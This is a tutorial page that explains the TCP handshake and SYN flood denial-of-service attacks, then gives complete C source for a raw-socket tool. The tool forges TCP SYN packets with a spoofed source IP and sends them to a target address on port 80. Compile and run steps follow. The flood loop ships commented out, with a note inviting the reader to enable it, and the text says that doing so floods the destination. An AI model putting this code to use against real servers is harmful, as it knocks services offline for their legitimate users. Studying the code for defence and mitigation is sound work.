SYN Flood DOS Attack with C Source Code

TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :

1. Client –SYN Packet–> Server
2. Server –SYN/ACK Packet –> Client
3. Client –ACK Packet –> Server

The above 3 steps are followed to establish a connection between source and destination.

SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.

Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.

For more information on TCP Syn DOS attack read up rfc 4987 , titled “TCP SYN Flooding Attacks and Common Mitigations”
over here

Below is an example code in c :

Code

1

/*

2	Syn Flood DOS with LINUX sockets

3

*/

4	#include<stdio.h>

5	#include<string.h> //memset

6	#include<sys/socket.h>

7	#include<stdlib.h> //for exit(0);

8	#include<errno.h> //For errno - the error number

9	#include<netinet/tcp.h>   //Provides declarations for tcp header

10	#include<netinet/ip.h>    //Provides declarations for ip header

11

12	struct pseudo_header    //needed for checksum calculation

13

{

14	unsigned int source_address;

15	unsigned int dest_address;

16	unsigned char placeholder;

17	unsigned char protocol;

18	unsigned short tcp_length;

19

20	struct tcphdr tcp;

21

};

22

23	unsigned short csum(unsigned short *ptr,int nbytes) {

24	register long sum;

25	unsigned short oddbyte;

26	register short answer;

27

28

sum=0;

29	while(nbytes>1) {

30	sum+=*ptr++;

31	nbytes-=2;

32

}

33	if(nbytes==1) {

34	oddbyte=0;

35	*((u_char*)&oddbyte)=*(u_char*)ptr;

36	sum+=oddbyte;

37

}

38

39	sum = (sum>>16)+(sum & 0xffff);

40	sum = sum + (sum>>16);

41	answer=(short)~sum;

42

43	return(answer);

44

}

45

46	int main (void)

47

{

48	//Create a raw socket

49	int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);

50	//Datagram to represent the packet

51	char datagram[4096] , source_ip[32];

52	//IP header

53	struct iphdr *iph = (struct iphdr *) datagram;

54	//TCP header

55	struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));

56	struct sockaddr_in sin;

57	struct pseudo_header psh;

58

59	strcpy(source_ip , "192.168.1.2");

60

61	sin.sin_family = AF_INET;

62	sin.sin_port = htons(80);

63	sin.sin_addr.s_addr = inet_addr ("1.2.3.4");

64

65	memset (datagram, 0, 4096); /* zero out the buffer */

66

67	//Fill in the IP Header

68	iph->ihl = 5;

69	iph->version = 4;

70	iph->tos = 0;

71	iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);

72	iph->id = htonl (54321); //Id of this packet

73	iph->frag_off = 0;

74	iph->ttl = 255;

75	iph->protocol = IPPROTO_TCP;

76	iph->check = 0;      //Set to 0 before calculating checksum

77	iph->saddr = inet_addr ( source_ip );    //Spoof the source ip address

78	iph->daddr = sin.sin_addr.s_addr;

79

80	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

81

82	//TCP Header

83	tcph->source = htons (1234);

84	tcph->dest = htons (80);

85	tcph->seq = 0;

86	tcph->ack_seq = 0;

87	tcph->doff = 5;      /* first and only tcp segment */

88	tcph->fin=0;

89	tcph->syn=1;

90	tcph->rst=0;

91	tcph->psh=0;

92	tcph->ack=0;

93	tcph->urg=0;

94	tcph->window = htons (5840); /* maximum allowed window size */

95	tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack

96	should fill in the correct checksum during transmission */

97	tcph->urg_ptr = 0;

98	//Now the IP checksum

99

100	psh.source_address = inet_addr( source_ip );

101	psh.dest_address = sin.sin_addr.s_addr;

102	psh.placeholder = 0;

103	psh.protocol = IPPROTO_TCP;

104	psh.tcp_length = htons(20);

105

106	memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

107

108	tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

109

110	//IP_HDRINCL to tell the kernel that headers are included in the packet

111	int one = 1;

112	const int *val = &one;

113	if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)

114

{

115	printf ("Error setting IP_HDRINCL. Error number : %d . Error message : %s \n" , errno, strerror(errno));

116

exit(0);

117

}

118

119	//Uncommend the loop if you want to flood :)

120	//while (1)

121

//{

122	//Send the packet

123	if (sendto (s,      /* our socket */

124	datagram,   /* the buffer containing headers and data */

125	iph->tot_len,    /* total length of our datagram */

126	0,      /* routing flags, normally always 0 */

127	(struct sockaddr *) &sin,   /* socket addr, just like in */

128	sizeof (sin)) < 0)       /* a normal send() */

129

{

130	printf ("error\n");

131

}

132	//Data send successfully

133

else

134

{

135	printf ("Packet Send \n");

136

}

137

//}

138

139

return 0;

140

}

Compile and Run

On Ubuntu

view source

print ?

1	$ gcc synflood.c

2	$ sudo ./a.out

3	Packet Send

Use wireshark to check the packets and replies from server.
The sendto function if put in a loop will start flooding the destination ip with syn packets.